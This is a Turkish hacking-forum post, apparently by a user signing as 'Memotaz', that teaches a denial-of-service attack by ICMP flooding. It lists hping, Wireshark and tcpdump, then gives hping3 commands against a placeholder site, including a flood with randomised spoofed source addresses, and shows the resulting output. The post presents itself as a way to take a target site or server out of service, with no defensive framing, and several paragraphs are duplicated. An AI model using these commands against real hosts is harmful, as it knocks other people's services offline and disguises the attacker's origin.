»♠ Amacımız ♠«
★Memotaz★
-Hedef Sitemize/Sunucumuza Baskın Bir Şekilde IMCP İsteği Göndererek, Hedef Siteyi/Sunucuyu Servis Dışı Bırakmak.
★Memotaz★
-Hedef Sitemize/Sunucumuza Baskın Bir Şekilde IMCP İsteği Göndererek, Hedef Siteyi/Sunucuyu Servis Dışı Bırakmak.
★Memotaz★
»♠ Gerekli Araçlar ♠«
★Memotaz★
-Hping
-Wireshark
-Tcpdump
★Memotaz★
-Hping
-Wireshark
-Tcpdump
★Memotaz★
»♠ Attack Gerçekleştirme ♠«
★Memotaz★
-Hping İle Öncelikle Asıl İp Adresimizden Hedef İp Sunucuya Saniyede 10 ICMP İsteği Yapmak İçin Alt Taraftaki Komut Kullanılır.
-İnfoyu İncelendiğimizde Cevapların Bizim İp Adresimize Döndüğünü Gözlemleyebiliriz.
-Hping İle Rastgele İp Adreslerinden "hedefsite.com"a ICMP Saldırısı Gerçekleştirmek İçin İse Aşağıda Vermiş Olduğum Komut Kullanılabilir.
Bu Şekilde Tüm IMCP Saldırımızı Başarıyla Gerçekleştirmiş Oluyoruz.
Konumu Okuduğunuz İçin Teşekkür Ederim, Olabildiğince Kaliteli Yapmaya Çalıştım.
Saygılarımla.
ΜƐΜΘŦĀẔ
-Hping İle Öncelikle Asıl İp Adresimizden Hedef İp Sunucuya Saniyede 10 ICMP İsteği Yapmak İçin Alt Taraftaki Komut Kullanılır.
Kod:
[COLOR="DarkRed"]root@MemotazKali#[/COLOR] hping3 --icmp hedefsite.com -i u1000
Kod:
[COLOR="DarkRed"]root@MemotazKali#[/COLOR] HPING hedefsite.com (eth0 *İp Adresi*): icmp mode set, 28 headers + 0 data bytes
len=46 ip=*İp Adresi* ttl=53 id=20108 icmp_seq=1 rtt=125.9 ms
len=46 ip=*İp Adresi* ttl=53 id=20109 icmp_seq=2 rtt=125.9 ms
len=46 ip=*İp Adresi* ttl=53 id=20067 icmp_seq=0 rtt=129.2 ms
len=46 ip=*İp Adresi* ttl=53 id=20878 icmp_seq=6 rtt=126.2 ms
len=46 ip=*İp Adresi* ttl=53 id=20993 icmp_seq=7 rtt=126.0 ms
len=46 ip=*İp Adresi* ttl=53 id=20250 icmp_seq=3 rtt=132.4 ms
len=46 ip=*İp Adresi* ttl=53 id=20511 icmp_seq=4 rtt=132.2 ms
len=46 ip=*İp Adresi* ttl=53 id=21775 icmp_seq=11 rtt=125.5 ms
len=46 ip=*İp Adresi* ttl=53 id=20767 icmp_seq=5 rtt=132.2 ms
len=46 ip=*İp Adresi* ttl=53 id=21546 icmp_seq=9 rtt=129.2 ms
len=46 ip=*İp Adresi* ttl=53 id=21249 icmp_seq=8 rtt=132.2 ms
Kod:
[COLOR="DarkRed"]root@MemotazKali#[/COLOR] hping3 --icmp hedefsite.com --flood --rand-source
HPING hedefsite.com (eth1 *İp Adresi*): icmp mode set, 28 headers + 0 data bytes
[COLOR="DarkRed"]hping in flood mode, no replies will be shown
--- hedefsite.com hping statistic ---[/COLOR]
97418 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Bu Şekilde Tüm IMCP Saldırımızı Başarıyla Gerçekleştirmiş Oluyoruz.
Konumu Okuduğunuz İçin Teşekkür Ederim, Olabildiğince Kaliteli Yapmaya Çalıştım.
Saygılarımla.
ΜƐΜΘŦĀẔ
.
.
.
.
.
Son düzenleme: